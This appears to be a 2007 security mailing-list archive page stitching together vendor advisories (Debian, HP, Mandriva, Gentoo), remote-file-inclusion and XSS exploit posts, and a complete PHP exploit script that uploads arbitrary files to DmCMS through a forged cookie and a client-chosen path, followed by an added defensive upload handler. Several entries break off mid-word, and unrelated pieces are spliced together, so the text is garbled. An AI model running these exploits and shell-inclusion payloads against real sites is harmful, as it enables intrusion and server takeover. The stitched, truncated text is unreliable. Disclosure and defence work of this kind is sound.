Post Revolution Remote File Inclusion
~~ Post Revolution Remote File Inclusion ~~

Affected Software .: Post Revolution 6.6 / 7.0 Release Candidate 2
Download ..........: http://www.fabio.com.ar/postrev/
Risk ..............: high
Date ..............: 25/3/2007
Found by ..........: InyeXion
Contact ...........: InyeXion[at]gmail.com
Web ...............: Www.InyeXion.com.ar

~~ Affected Files:
/common.php
/themes/default/preview_post_completo.php

Vulnerable Code: /common.php

Line [10]   include ($dir."themes/".$config_data["template"]."/encabezado.php");
Line [16]   include ($dir."themes/".$config_data["template"]."/cuerpo.php");
Line [22]   include ($dir."themes/".$config_data["template"]."/pie.php");
Line [37]   include ($dir."themes/".$config_data["template"]."/menu_principal.php");
Line [49]   include ($dir."themes/".$config_data["template"]."/error.php");
Line [129]  include ($dir."themes/".$config_data["template"]."/login_form.php");
Line [135]  include ($dir."themes/".$config_data["template"]."/logout.php");
Line [174]  include ($dir."language/".$config_data["lang"].".php");
Line [272]  include ($dir."language/".$config_data["lang"].".php");
Line [282]  include ($dir."themes/".$config_data["template"]."/seccion.php");
Line [360]  include ($dir."language/".$config_data["lang"].".php");
Line [446]  include ($dir."themes/".$config_data["template"]."/post.php");
Line [460]  include ($dir."language/".$config_data["lang"].".php");
Line [543]  include ($dir."themes/".$config_data["template"]."/archivo_noticias.php");
Line [549]  include ($dir."themes/".$config_data["template"]."/cuerpo_archivo.php");
Line [570]  include ($dir."language/".$config_data["lang"].".php");
Line [628]  include ($dir."themes/".$config_data["template"]."/post_completo.php");
Line [641]  include ($dir."language/".$config_data["lang"].".php");
Line [661]  include ($dir."language/".$config_data["lang"].".php");
Line [680]  include ($dir."themes/".$config_data["template"]."/posts_usuario.php");
Line [692]  include ($dir."language/".$config_data["lang"].".php");
Line [715]  include ($dir."themes/".$config_data["template"]."/comment_encabezado.php");
Line [750]  include ($dir."themes/".$config_data["template"]."/comment.php");
Line [770]  include ($dir."themes/".$config_data["template"]."/comment_form.php");
Line [776]  include ($dir."themes/".$config_data["template"]."/info.php");
Line [782]  include ($dir."themes/".$config_data["template"]."/info.php");
Line [1054] include ($dir."language/".$config_data["lang"].".php");
Line [1106] include ($dir."themes/".$config_data["template"]."/encuesta_head.php");
Line [1124] include ($dir."themes/".$config_data["template"]."/encuesta_opc.php");
Line [1128] include ($dir."themes/".$config_data["template"]."/encuesta_pie.php");
Line [1159] include ($dir."themes/".$config_data["template"]."/encuesta_head_ver.php");
Line [1180] include ($dir."themes/".$config_data["template"]."/encuesta_opc_ver.php");
Line [1183] include ($dir."themes/".$config_data["template"]."/encuesta_pie_ver.php");
Line [1231] include ($dir."themes/".$config_data["template"]."/encuestas_anteriores.php");
Line [1242] include ($dir."themes/".$config_data["template"]."/tagmenu.php");
Line [1297] include ($dir."themes/".$config_data["template"]."/tagpost.php");
Line [1310] include ($dir."language/".$config_data["lang"].".php");
Line [1482] include ($dir."language/".$config_data["lang"].".php");
Line [1506] include ($dir."themes/".$config_data["template"]."/categoria_enlace.php");
Line [1521] include ($dir."themes/".$config_data["template"]."/enlacefila.php");
Line [1570] include ($dir."config.php");
Line [1676] include ($dir."language/".$config_data["lang"].".php");
Line [1678] include ($dir."themes/".$config_data["template"]."/buscar.php");
Line [1685] include ($dir."language/".$config_data["lang"].".php");
Line [1723] include ($dir."themes/".$config_data["template"]."/resultado.php");
Line [1730] include ($dir."language/".$config_data["lang"].".php");
Line [1766] include ($dir."themes/".$config_data["template"]."/busq-dato.php");
Line [1772] include ($dir."themes/".$config_data["template"]."/busq-resultado.php");
Line [1778] inc
c-arbre <= Multiple Remote File Include Vulnerability
# c-arbre <= Multiple Remote File Include Vulnerability
# D.Script: http://fresh.t-systems-sfr.com/unix/src/www/c-arbre_0.6PR7_full.tar.gz
# Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit: [Path]/c-arbre/espaces/communiques/annotations.php?root_path=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
[SECURITY] [DSA 1279-1] New webcalendar packages fix cross-site scripting
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1279-1                    [EMAIL PROTECTED]
http://www.debian.org/security/                        Moritz Muehlenhoff
April 22nd, 2007                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : webcalendar
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-6669

It was discovered that WebCalendar, a PHP-based calendar application, performs insufficient sanitising in the exports handler, which allows injection of web script.

For the old stable distribution (sarge) this problem has been fixed in version 0.9.45-4sarge7.

The stable distribution (etch) no longer contains WebCalendar packages.

For the unstable distribution (sid) this problem has been fixed in version 1.0.5-2.

We recommend that you upgrade your webcalendar package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7.dsc
    Size/MD5 checksum:    608 0c12e6c6307413350af264045a4df964
  http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7.diff.gz
    Size/MD5 checksum:  13013 ced8d9c6f7d52a42c3297a685547cb06
  http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45.orig.tar.gz
    Size/MD5 checksum: 612360 a6a66dc54cd293429b604fe6da7633a6

Architecture independent components:

  http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7_all.deb
    Size/MD5 checksum: 629712 39fca1d949580d18e1e293a1c181b1a8

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGK3fhXm3vHE4uyloRAiHOAJ0QtrQgIsQBKm6qCmWWfBwRWG6G0gCffVxw
MuZS2n/wJveeDEn8ZJUPrv4=
=CkBR
-----END PGP SIGNATURE-----
Ripe Website Manager (<= 0.8.4) - SQL Injection Vulnerability and Cross-Site Scripting Exploit
Ripe Website Manager (<= 0.8.4) - Cross-Site Scripting and SQL Injection Exploit

Discovered by John Martinelli (http://john-martinelli.com)

Google d0rk: "Powered by Ripe Website Manager"
(http://www.google.com/search?q=%22Powered+by+Ripe+Website+Manager)

Exploit: an HTML form posting (method="post") to http://www.example.com/path/contact/index.php; the form fields themselves are not present on the page.
[security bulletin] HPSBUX02183 SSRT061243 rev.1 - HP-UX sendmail, Remote Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00841370
Version: 1

HPSBUX02183 SSRT061243 rev.1 - HP-UX sendmail, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2007-04-16
Last Updated: 2007-04-17

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running sendmail. This vulnerability could allow a remote user to cause a Denial of Service (DoS).

References: none

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00 (obsolete) running sendmail 8.9.3 or sendmail 8.11.1,
HP-UX B.11.11 running sendmail 8.9.3 or sendmail 8.11.1,
HP-UX B.11.23 running sendmail 8.11.1.

BACKGROUND

To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if the recommended patch or update is installed.

AFFECTED VERSIONS

For sendmail 8.11.1

HP-UX B.11.23
=============
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_35485 or subsequent

HP-UX B.11.11
=============
SMAIL-UPGRADE.INETSVCS-SMAIL
action: install revision B.11.11.02.004 or subsequent

HP-UX B.11.00
=============
SMAIL-811.INETSVCS-SMAIL
action: remove (use sendmail 8.9.3) or upgrade to HP-UX B.11.11

For sendmail 8.9.3

HP-UX B.11.11
=============
InternetSrvcs.INETSVCS-RUN
action: install PHNE_35484 or subsequent

For sendmail 8.9.3

HP-UX B.11.00
=============
InternetSrvcs.INETSVCS-RUN
action: install PHNE_35483 or subsequent

END AFFECTED VERSIONS

Note: sendmail 8.13.3 currently available from http://software.hp.com does not exhibit this DoS issue. sendmail 8.11.1 is no longer available from http://software.hp.com for HP-UX B.11.11; customers are encouraged to upgrade to sendmail 8.13.3.

RESOLUTION

HP has made the following patches available to resolve the issue. The patches are available from http://itrc.hp.com

For sendmail 8.11.1, HP-UX B.11.23
Install: PHNE_35485 or subsequent
sendmail -bs banner: Sendmail 8.11.1 (Revision 1.10)/8.11.1
what(1) string: version.c 8.11.1 (Berkeley) - 01 December 2006 (PHNE_35485)

For sendmail 8.11.1, HP-UX B.11.11
Please write to [EMAIL PROTECTED] for more information.

For sendmail 8.11.1, HP-UX B.11.00
Use sendmail 8.9.3 or upgrade to B.11.11 or subsequent. There will be no update to sendmail 8.11.1 for HP-UX B.11.00 to resolve the vulnerability.

For sendmail 8.9.3, HP-UX B.11.11
Install: PHNE_35484 or subsequent
sendmail -bs banner: Sendmail 8.9.3 (Revision 1.10)/8.9.3
what(1) string: version.c 8.9.3 (Berkeley) 01 December 2006 (PHNE_35484)

For sendmail 8.9.3, HP-UX B.11.00
Install: PHNE_35483 or subsequent
sendmail -bs banner: Sendmail 8.9.3 (Revision 1.10)/8.9.3
what(1) string: version.c 8.9.3 (Berkeley) 01 December 2006 (PHNE_35483)

MANUAL ACTIONS: Yes - NonUpdate
HP-UX B.11.11 sendmail 8.11.1 - Write to [EMAIL PROTECTED]
HP-UX B.11.00 sendmail 8.11.1 - Use sendmail 8.9.3 or upgrade to HP-UX B.11.11 or subsequent
HP-UX B.11.23 sendmail 8.11.1 - No manual actions
HP-UX B.11.11 sendmail 8.9.3 - No manual actions
HP-UX B.11.00 sendmail 8.9.3 - No manual actions

PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?_productNumber=B6834AA

HISTORY:
Version: 1 (rev.1) - 16 April 2007 Initial release

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subsc
phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit
phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit

Discovered by John Martinelli (http://john-martinelli.com)

Google d0rk: "Powered by Ripe Website Manager"
(http://www.google.com/search?q=+%22Powered+by+phpMySpace+Gold+8.10%22)

Exploit: an HTML form submitting (method="get") to http://www.example.com/path/modules/news/article.php; the form fields themselves are not present on the page.
3proxy 0.5.3i bugfix release
Background:

3proxy [1] is a universal, multifunctional, free, open-source proxy server with support for multiple protocols (HTTP/HTTPS/FTP over HTTP, POP3, FTP, SOCKS 4/4.5/5, UDP and TCP port mapping, DNS proxy), with ACL-based access control, proxy chaining, traffic accounting, bandwidth limitation, configurable logging, etc., for Windows/Linux/Unix.

Description:

On April 14 the 3proxy development team released the urgent 0.5.3h update [2] for 3proxy, fixing a stack-based buffer overflow vulnerability in both the Windows and Linux/Unix 3proxy versions 0.5-0.5.3g and in the 0.6-devel branch before the date of the fix (CVE-2007-2031) [3]. The vulnerability was found during a bug report investigation. The binary 3proxy 0.6-devel distribution is compiled with stack protection.

On April 20 the reviewed 0.5.3i version [2] of 3proxy was released, fixing a few security-unrelated functionality issues with bandwidth limitation and traffic limitation.

Update information:

All 3proxy users are advised to update to the latest 0.5.3i (or at least 0.5.3h) or 0.6-devel version [4]. Please subscribe to the three-proxy-announce mailing list [5] to be immediately informed of new 3proxy releases.

Announce:

The 0.6 version of 3proxy introduces extended access control / traffic control features and plugins/extensions support. Windows authentication is in beta testing, the regular expressions filtering/rewriting plugin is in alpha testing, an LDAP plugin is in development, and antiviral plugins are planned for development. We invite port maintainers, developers and beta testers.

References:

[1] 3proxy official homepage
    http://3proxy.ru/
[2] 3proxy 0.5.3i Changelog
    http://3proxy.ru/0.5.3i/Changelog.txt
[3] CVE-2007-2031
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2031
[4] 3proxy download page
    http://3proxy.ru/download/
[5] 3proxy announcements mailing list at Sourceforge
    https://lists.sourceforge.net/lists/listinfo/three-proxy-announce
TJSChat Version 0.95 Cross Site Scripting
Xmor$ Security Vulnerability Research TM

# Title ......: TJSChat Version 0.95 Cross Site Scripting
# Author .....: [the_Edit0r]
# HomePage ...: [Www.XmorS-SEcurity.coM] [Www.XmorS.coM]
# Location ...: [Iran]
# Software ...: [TJSChat]
# Site Script : [http://www.toutjavascript.com]
# We ArE .....: [ Scorpiunix, KAMY4r, Zer0.Cod3r, SilliCONIC, D3vil_B0y_ir, S.W.A.T, DarkAngel ]

--- proof Of Concept ---

www.example.com/[path]/you.php?user=alert(/the_Edit0r/);

---

# Contact me : the_3dit0r[at]Yahoo[dot]coM
# [XmorS-SEcurity.coM]
acvsws_php5_v1.0 <= Multiple Remote File Include Vulnerability
# acvsws_php5_v1.0 <= Multiple Remote File Include Vulnerability
# D.Script: http://www.acvsnet.net/DNN ACVS/Portals/0/_Commun/WebServices/acvsws_php5_v1.0_release.zip/
# Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit: [Path]/inc_ACVS/SOAP/Transport.php?CheminInclude=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
# Greetz To: aLL mY Friends
RE: Yet another SQL injection framework
The script simply hides or shows the link on the page which points to sf.

http://sourceforge.net/projects/injection-fwk/

-----Original Message-----
From: Nick Boyce [mailto:[EMAIL PROTECTED]
Sent: Friday, April 20, 2007 9:13 AM
To: bugtraq@securityfocus.com
Cc: Guillermo Marro
Subject: Re: Yet another SQL injection framework

On 4/19/07, Guillermo Marro <[EMAIL PROTECTED]> wrote:
> FG-Injector is a free tool that leverages the pentester's work by
> facilitating the exploitation of SQL Injection vulnerabilities.
[...]
> Get both, sources and a windows binary from:
> http://www.flowgate.net/?lang=en&seccion=herramientas

Um .. when I click on the link for "FG-Injector" at the above site with my NoScript-enabled Firefox all I see is what looks like a server log entry for my interaction :

  aaa.bbb.ccc.ddd Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 /injector

This is presumably because the actual links are infested with Javascript :

  onClick="javascript:showStaff('injector')"

Since I'm following links in an email on a security mailing list I'm disinclined to disable NoScript - any chance you can convert the links into normal HREFs ? I could go and grab your Javascript library and figure out what 'showStaff' does ... but I'd rather just click on an old-school link.

Cheers
Nick Boyce
--
I speak to all bloggers everywhere: just shut up for a second and let me think, will you?
-- blog comment at http://it-gears.blogspot.com/ :-)
DmCMS Shell Uploading
Hello

Title         : DmCMS Shell Upload
Discovered by : HACKERS PAL
Copyrights    : HACKERS PAL
Website       : WwW.SoQoR.NeT
Email         : [EMAIL PROTECTED]
File          : includes/upload_file.php

After Giving Some conditions will allow you to upload any file you want
the exploit here is the proof ..

exploit :

#!/usr/bin/php -q -d short_open_tag=on
*/
/* site: http://www.soqor.net */');
if ($argc<4) {
    print_r('
/* -- */
/* Usage: php '.$argv[0].' host path topath
/* Example:                                  */
/* php '.$argv[0].' localhost /dmcms/ ../media/
/**/
');
    die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

Function get_page($url)
{
    if(function_exists("file_get_contents")) {
        $contents = file_get_contents($url);
    } else {
        $fp=fopen("$url","r");
        while($line=fread($fp,1024)) {
            $contents=$contents.$line;
        }
    }
    return $contents;
}

function connect($packet)
{
    global $host, $port, $html;
    $con=fsockopen(gethostbyname($host),$port);
    if (!$con) {
        echo '[-] Error - No response from '.$host.':'.$port;
        die;
    }
    fputs($con,$packet);
    $html='';
    while ((!feof($con)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
        $html.=fread($con,1);
    }
    GLOBAL $html;
    fclose($con);
}

$i=0;
$data="";
function add_data($name,$value,$type="no",$filename)
{
    GLOBAL $data,$i;
    if($type=="file") {
        $data.="-7d62702f250530
Content-Disposition: form-data; name=\"$filename\"; filename=\"$name\";
Content-Type: text/plain

$value
";
    } elseif($type=="init") {
        $data.="-7d62702f250530--";
    } elseif($type=="clean") {
        $data="";
    } else {
        $data.="-7d62702f250530
Content-Disposition: form-data; name=\"$name\";
Content-Type: text/plain

$value
";
    }
}

$host=$argv[1];
$path=$argv[2];
$default_path=$argv[3];
$port=80;
$cmd=urlencode($cmd);
$p='http://'.$host.':'.$port.$path;
Echo "\n[+] Trying to Upload File";
$cookie="Master=HACKERS20%PAL";
$contents='';
add_data("empty.php","","file","File1");
add_data("soqor.php",$contents,"file","File2");
add_data("soqor.php",$contents,"file","File3");
add_data('','',"init");
$packet="POST ".$p."includes/upload_file.php?default_path=$default_path HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."ok.php?do=act\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---7d62702f250530\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
connect($packet);
if (!eregi($default_path,$html)) {
    echo"\n/* [+] Successfully Exploited";
}
echo ("\n/* Visit us : WwW.SoQoR.NeT */\n/**/");
?>

#WwW.SoQoR.NeT
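The request the post builds relies on three things the upload handler evidently does not check: a fixed cookie value standing in for a login, a client-supplied default_path that chooses the destination directory, and no inspection of what is actually being uploaded. The handler below is an added example (not DmCMS code) showing how an upload endpoint closes each of those gaps; UPLOAD_DIR, the CSRF token names and the image-only policy are assumptions for the example.

```php
<?php
// Added example, not DmCMS code: an upload handler that enforces the checks the
// request in the post depends on being absent.  Assumed: files are stored in
// UPLOAD_DIR, which is outside the web root, and only images are expected.
declare(strict_types=1);

const UPLOAD_DIR   = '/var/app-data/uploads';   // assumed; not served by the web server
const MAX_BYTES    = 2 * 1024 * 1024;
const ALLOWED_MIME = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

/**
 * Stores one uploaded file and returns the server-chosen name.
 * $file is one entry of $_FILES; the two tokens come from the form and the session.
 */
function handle_upload(array $file, string $formToken, string $sessionToken): string
{
    // 1. Authorisation comes from the server-side session, not from a cookie value
    //    the client can simply set; the CSRF token ties the post to that session.
    if ($sessionToken === '' || !hash_equals($sessionToken, $formToken)) {
        throw new RuntimeException('request not tied to an authenticated session');
    }

    // 2. Reject anything PHP flagged and anything that is not a genuine upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // 3. Decide the type from the content, never from the client's file name
    //    or Content-Type header (the post sends text/plain for .php names).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_MIME[$mime])) {
        throw new RuntimeException('unsupported file type');
    }

    // 4. The destination directory is fixed (no default_path parameter) and the
    //    name is random with a server-chosen extension, so neither the name
    //    nor the location can be steered by the request.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_MIME[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // not executable, not world-readable
    return $name;
}

// Usage inside the form handler (assumed form field and session key names):
// session_start();
// $saved = handle_upload($_FILES['File1'], $_POST['csrf'] ?? '', $_SESSION['csrf'] ?? '');
```

Keeping the upload directory outside the document root matters even with the type check in place: a file that is never served as a script cannot become a shell regardless of what slips past the MIME detection, and serving stored images through a small read-only handler keeps that property.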
[ MDKSA-2007:093 ] - Updated zziplib packages fix vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2007:093
http://www.mandriva.com/security/
_______________________________________________________________________

Package : zziplib
Date    : April 23, 2007
Affected: Corporate 4.0
_______________________________________________________________________

Problem Description:

A stack-based buffer overflow in the ZZIPlib library could allow user-assisted remote attackers to cause an application crash (DoS) or execute arbitrary code via a long filename.

Updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1614
_______________________________________________________________________

Updated Packages:

Corporate 4.0:
a0ac9e92d0beee7726739000791e6748  corporate/4.0/i586/zziplib0-0.13.33-4.1.20060mlcs4.i586.rpm
1518189e431ccd97aa491a4591de80d6  corporate/4.0/i586/zziplib0-devel-0.13.33-4.1.20060mlcs4.i586.rpm
c17957866cab01574723960484e792a9  corporate/4.0/SRPMS/zziplib-0.13.33-4.1.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
91e3feceacc5f9fd7629525d1be8b951  corporate/4.0/x86_64/zziplib0-0.13.33-4.1.20060mlcs4.x86_64.rpm
641b79b72b74306264f8cc40b89ecf68  corporate/4.0/x86_64/zziplib0-devel-0.13.33-4.1.20060mlcs4.x86_64.rpm
c17957866cab01574723960484e792a9  corporate/4.0/SRPMS/zziplib-0.13.33-4.1.20060mlcs4.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGLO2pmqjQ0CJFipgRAh2lAJsFOiiEm3c5n10Jlbdy2D2FOGXq9ACg7YDJ
/HL9x4tONQFyI8wRo+wDE3M=
=jMiN
-----END PGP SIGNATURE-----
[ GLSA 200704-20 ] NAS: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200704-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: NAS: Multiple vulnerabilities
      Date: April 23, 2007
      Bugs: #171428
        ID: 200704-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The Network Audio System is vulnerable to a buffer overflow that could result in the execution of arbitrary code with root privileges.

Background
==========

NAS is a network transparent, client/server audio transport system.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  media-libs/nas        < 1.8b                              >= 1.8b

Description
===========

Luigi Auriemma has discovered multiple vulnerabilities in NAS, some of which include a buffer overflow in the function accept_att_local(), an integer overflow in the function ProcAuWriteElement(), and a null pointer error in the function ReadRequestFromClient().

Impact
======

An attacker having access to the NAS daemon could send an overly long slave name to the server, leading to the execution of arbitrary code with root privileges. A remote attacker could also send a specially crafted packet containing an invalid client ID, which would crash the server and result in a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All NAS users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-libs/nas-1.8b"

References
==========

  [ 1 ] CVE-2007-1543
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1543
  [ 2 ] CVE-2007-1544
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1544
  [ 3 ] CVE-2007-1545
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1545
  [ 4 ] CVE-2007-1546
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1546
  [ 5 ] CVE-2007-1547
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1547

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-20.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ MDKSA-2007:092 ] - Updated freeradius packages fix vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2007:092
http://www.mandriva.com/security/
_______________________________________________________________________

Package : freeradius
Date    : April 23, 2007
Affected: Corporate 4.0
_______________________________________________________________________

Problem Description:

Multiple buffer overflows were found in the FreeRADIUS package version 1.0.4 and prior that could allow a remote attacker to cause a crash via the rlm_sqlcounter module (CVE-2005-4746). As well, an SQL injection vulnerability was also found in the rlm_sqlcounter that could allow a remote attacker to execute arbitrary SQL commands via unknown attack vectors (CVE-2005-4745).

Updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4745
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4746
_______________________________________________________________________

Updated Packages:

Corporate 4.0:
523055be4399355565d6175d7df13ca7  corporate/4.0/i586/freeradius-1.0.4-2.4.20060mlcs4.i586.rpm
4e000a3cb2c8cb2f3359a961878a310a  corporate/4.0/i586/libfreeradius1-1.0.4-2.4.20060mlcs4.i586.rpm
3e9f17beada7d6d10235c6db8156a77a  corporate/4.0/i586/libfreeradius1-devel-1.0.4-2.4.20060mlcs4.i586.rpm
0429cf3dda93772e358fc34a1d5cb1f8  corporate/4.0/i586/libfreeradius1-krb5-1.0.4-2.4.20060mlcs4.i586.rpm
216c28ffac0b1d03a493d5548556be2d  corporate/4.0/i586/libfreeradius1-ldap-1.0.4-2.4.20060mlcs4.i586.rpm
07ebd1dbb7d4f1a71253ebab163f1dd8  corporate/4.0/i586/libfreeradius1-mysql-1.0.4-2.4.20060mlcs4.i586.rpm
9b3586d1c94b6cf650723a095db846d7  corporate/4.0/i586/libfreeradius1-postgresql-1.0.4-2.4.20060mlcs4.i586.rpm
10b8fb70adfc1a641b2f63c041db1069  corporate/4.0/i586/libfreeradius1-unixODBC-1.0.4-2.4.20060mlcs4.i586.rpm
0fb72186b61687df8dedff8d874fbb86  corporate/4.0/SRPMS/freeradius-1.0.4-2.4.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
435d07e3a5878cb0fd27e02fbee702df  corporate/4.0/x86_64/freeradius-1.0.4-2.4.20060mlcs4.x86_64.rpm
f57c46977fbd86772852f21d138605de  corporate/4.0/x86_64/lib64freeradius1-1.0.4-2.4.20060mlcs4.x86_64.rpm
bcc4dc4cac18ed3d034483de311fe240  corporate/4.0/x86_64/lib64freeradius1-devel-1.0.4-2.4.20060mlcs4.x86_64.rpm
646309915542dad2b6e68ff130fead11  corporate/4.0/x86_64/lib64freeradius1-krb5-1.0.4-2.4.20060mlcs4.x86_64.rpm
039290c0f429ff9f5ecf1ce13b17765f  corporate/4.0/x86_64/lib64freeradius1-ldap-1.0.4-2.4.20060mlcs4.x86_64.rpm
0ca4c838dae5657c3f902ed2234a7286  corporate/4.0/x86_64/lib64freeradius1-mysql-1.0.4-2.4.20060mlcs4.x86_64.rpm
a48ad352690163f2fd90f022007bcd7a  corporate/4.0/x86_64/lib64freeradius1-postgresql-1.0.4-2.4.20060mlcs4.x86_64.rpm
